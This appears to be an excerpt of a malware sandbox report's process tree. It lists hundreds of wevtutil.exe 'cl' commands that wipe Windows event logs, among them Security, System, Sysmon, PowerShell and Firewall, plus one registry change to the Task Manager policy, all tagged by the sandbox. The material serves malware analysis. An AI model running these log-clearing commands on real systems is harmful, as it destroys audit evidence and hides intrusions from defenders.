    wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    - Clears Windows event logs
    PID:2844
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    - Clears Windows event logs
    PID:2012
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
    3⤵
    PID:456
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
    3⤵
    PID:924
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
    3⤵
    PID:716
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
    3⤵
    - Clears Windows event logs
    PID:2432
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
    3⤵
    PID:412
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
      4⤵
      PID:4616
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
    3⤵
    PID:3724
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
    3⤵
    - Clears Windows event logs
    PID:3680
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
    3⤵
    PID:320
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
    3⤵
    - Clears Windows event logs
    PID:3996
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
    3⤵
    PID:548
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Debug"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Analytic"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSettings/Diagnostic"
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Operational"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TWinUI/Operational"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZSync/Operational"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Maintenance"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:400
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Admin"
    3⤵
    PID:928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    - Clears Windows event logs
    PID:4804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Tethering-Manager/Analytic"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Troubleshooting-Recommended/Operational"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Device Registration/Admin"
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/ActionCenter"
    3⤵
    - Clears Windows event logs
    PID:4272
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UxInit/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:692
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VHDMP-Operational"
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VPN-Client/Operational"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Volume/Diagnostic"
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Operational"
    3⤵
    PID:432
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Operational"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WiFiDisplay/Analytic"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
    3⤵
    PID:372
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinMDE/MDE"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WlanDlg/Analytic"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WorkFolders/Operational"
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-XAML/Default"
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-XAudio2/Debug"
    3⤵
    PID:712
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-glcnd/Diagnostic"
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ntshrui-perf"
    3⤵
    PID:100
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-wmbclass/Analytic"
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-WindowsPhone-Net-Cellcore-CellManager/Debug"
    3⤵
    PID:224
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OpenSSH/Operational"
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "RTWorkQueueTheading"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "SmbWmiAnalytic"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "TabletPC_InputPanel_Channel/IHM"
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_VC1ENC_CHANNEL"
    3⤵
    PID:876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_wmvdecod_CHANNEL"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Windows Networking Vpn Plugin Platform/OperationalVerbose"
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "muxencode"
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WordChannel"
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Windows PowerShell"
    3⤵
    - Clears Windows event logs
    PID:4820
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Windows Networking Vpn Plugin Platform/Operational"
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WMPSyncEngine"
    3⤵
    PID:396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WMPSetup"
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
    3⤵
    - Clears Windows event logs
    PID:972
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MSMPEG2ADEC_CHANNEL"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MFH264Enc_CHANNEL"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "WINDOWS_KS_CHANNEL"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Uac/Debug"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "UIManager_Channel"
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "TimeBroker"
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "TabletPC_InputPanel_Channel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4084
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "SystemEventsBroker"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "System"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Setup"
    3⤵
    - Clears Windows event logs
    PID:1324
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Security"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "SMSApi"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "RTWorkQueueExtended"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "PlayReadyPerformanceChannel"
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Physical_Keyboard_Manager_Channel"
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OpenSSH/Debug"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OpenSSH/Admin"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OfficeDebugChannel"
    3⤵
    PID:372
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OfficeChannel"
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OSK_SoftKeyboard_Channel"
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "OAlerts"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Network Isolation Operational"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Navigator"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-WindowsPhone-Net-Cellcore-CellularAPI/Debug"
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-WindowsPhone-LocationServiceProvider/Debug"
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-WindowsPhone-Connectivity-WiFiConnSvc-Channel"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-wmbclass/Trace"
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ntshrui"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-glcnd/Debug"
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-glcnd/Admin"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-XAudio2/Performance"
    3⤵
    - Clears Windows event logs
    PID:4544
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-XAML-Diagnostics/Default"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Workplace Join/Admin"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WorkFolders/WHC"
    3⤵
    PID:3724
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WorkFolders/Debug"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WorkFolders/Analytic"
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4240
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
    3⤵
    PID:3788
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-NameResolution/Operational"
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
    3⤵
    PID:432
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Analytic"
    3⤵
    - Clears Windows event logs
    PID:5116
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUIImmersive/Operational"
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUIImmersive/Diagnostic"
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallDiagnostics"
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinURLMon/Analytic"
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
    3⤵
    PID:400
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinNat/Trace"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinNat/Oper"
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinML/Analytic"
    3⤵
    PID:3924
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/WebSocket"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/UsageLog"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet-Config/ProxyConfigChanged"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet-Capture/Analytic"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Operational"
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Messages"
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Contention"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Websocket-Protocol-Component/Tracing"
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebcamProvider/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4516
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebPlatStorage-Server"
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebAuthN/Operational"
    3⤵
    - Clears Windows event logs
    PID:1884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebAuth/Operational"
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wcmsvc/Operational"
    3⤵
    PID:100
